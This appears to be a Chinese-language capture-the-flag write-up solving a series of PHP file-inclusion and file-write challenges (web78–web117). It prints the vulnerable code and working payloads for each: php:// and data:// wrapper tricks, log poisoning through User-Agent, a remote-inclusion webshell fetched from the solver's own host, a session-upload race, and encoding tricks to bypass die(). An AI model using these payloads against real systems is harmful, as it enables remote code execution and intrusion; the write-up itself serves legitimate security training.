web78 无防护读取源码
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
伪协议读取后base64解密
php://filter/read=convert.base64-encode/resource=flag.php
web79 data协议
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
过滤了php,php到是可以用大写绕过,但是文件名flag.php中的php不能大小写,所以用cat这一类的函数,就能避免输入文件名的php。也可以直接base64绕过php
?file=data://text/plain,<?PHP system('tac fl*');?>
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
web80 input协议
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
php data被过滤,这里试了以下php://input成功了,看了一下bp,用到了包含日志文件
get:?file=phP://input
post: <?PHP system('tac fl*');?>
通过url或者UA操作后就会在日志中记录,这时再通过包含日志文件达到执行的效果
第一次:User-Agent: <?php system('tac fl*');?>
第二次:?file=/var/log/nginx/access.log
这题也能远程文件包含,上传后可直接蚁剑连接,或者直接命令执行
xxxx为自己网站:?file=http://xxxx/shell.txt
shell.txt中:<?php eval($_POST[1]);?>
1=system('tac f*');
web81 包含日志
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
多过滤了一个:
,这里尝试包含一下日志文件,发现还是可以的,使用上一关的方法
第一次:User-Agent: <?php system('tac fl*');?>
第二次:?file=/var/log/nginx/access.log
多过滤了:
,那么 远程文件包含肯定是没希望了
web82 session.upload_progress
新知识点,主要思路是通过上传可控的PHP_SESSION_UPLOAD_PROGRESS临时文件并将其当作跳板来访问/tmp/sess_xxxfreebuf讲解,由于临时文件的原因我们还需要进行条件竞争,可以写脚本,也能直接通过burp来进行爆破攻击。 下面是做题的步骤
先自己搞个网页,修改地址
<!DOCTYPE html>
<html>
<body>
<form action="http://ff1886cd-dda8-48a2-8182-c1b98d685973.challenge.ctf.show:8080" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
上传后抓包
这个网页就是我们用来上传临时文件的,接下来我们再通过题目网页来抓一个访问的网页,当然知道临时文件的地址也是利用这个漏洞的一个条件
上面两个网页搞好之后,就开始同时爆破(intruder),一个用来创建临时文件,一个用来访问,通过这样的条件竞争来达到利用的目的。
再修改命令进行cat flag
web83 删除未初始化session
web84 删除所有临时文件后文件包含
只要我爆破的够快,rm就跟不上我
web85 检查< 尖括号
web86 定义了包含路径
web87 rot13
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
文件写入,这里可以通过base64或者rot13来绕过,因为题目中存在urldecode,所以需要两个url编码
php://filter/write=string.rot13/resource=1.php 两次url编码
get:?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
<?php system('tac f*');?>
post:content=<?cuc flfgrz('gnp s*');?>
访问1.php,发现成功写入,得到flag,也可base64,但是这个就挺简单的
web88
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
没有过滤://
,那就直接cat flag
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg
web116 foremost分离图片
用这样的方法将视频另存在桌面上,丢到010里面发现PNG图片前缀,利用foremost将其分离出来
发现是源代码,前面的一些过滤都没有用,因为有file_get_contents()函数,所以直接读取flag即可,但是这样只能抓包查看
?file=flag.php
?file=compress.zlib:///var/www/html/flag.php
web117 绕过die
<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
die('too young too simple sometimes naive!');
}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);
这里不管传什么都会先出现一个<?php die();?>
,所以首先要绕过die(),如果file与contents采用base64,rot13之类的”特殊方式“识别,那么<?php die();?>也会因此被特殊化掉,这样他就失去了他的用处,可这里base与rot都被禁掉了,那么就得采用一些与此类似的东西php支持的字符集编码,这里采用UCS-2LE UCS-2BE:将字符两位两位进行交换
get: ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post: contents=?<hp pvela$(P_SO[T]1;)>?
随后直接在a.php页面中传参
get:a.php
post: 1=system('tac f*');